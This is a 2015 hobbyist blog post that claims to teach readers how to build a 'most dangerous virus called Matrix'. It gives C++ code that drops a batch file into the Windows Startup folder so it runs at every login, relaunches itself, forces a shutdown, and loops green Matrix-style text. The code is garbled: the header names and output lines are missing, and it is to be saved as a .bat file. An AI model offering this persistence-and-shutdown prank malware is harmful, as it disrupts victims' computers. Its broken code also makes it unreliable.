Monday, 12 January 2015

MAKING MOST DANGEROUS VIRUS CALLED MATRIX

Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

Related Posts:

  • How to recover (Ctrl+Alt+Del) permanently deleted file? Sometimes we delete the files permanently, and realize that those files are important.... For all those folks, Here is the solution Software called "Kissass Undelete" , can bring those files from the hard disk or your fla… Read More
  • [ROOT] Framaroot, a one-click apk to root some devices Installation Download it on your device (links are available at the end of this post) Install it with a file explorer or directly from your internet browser, if android warn you about security risk, say OK and check Unkn… Read More
  • How to Disable StartUp Programs in Windows The more softwares you install on your computer, Windows takes more time to StartUp or boot, Which is quite irritating... Many programs add themselves to the list of programs started when you boot your computer, and that l… Read More
  • How To Make An Undeletable Folder in Windows How To Make An Undeletable Folder It probably happened once, that someone deleted a folder ,which is containing a few hundred files and was very important.If you’d like to avoid anything similar happening in … Read More
  • Make your Computer Welcome You We generally see in movies that the PC of the Actor/Actress welcomes him by calling his/her name. We also want that our PC should also welcomes us like them. With this trick, you can make your Computer welcome you in i… Read More

0 comments:

Post a Comment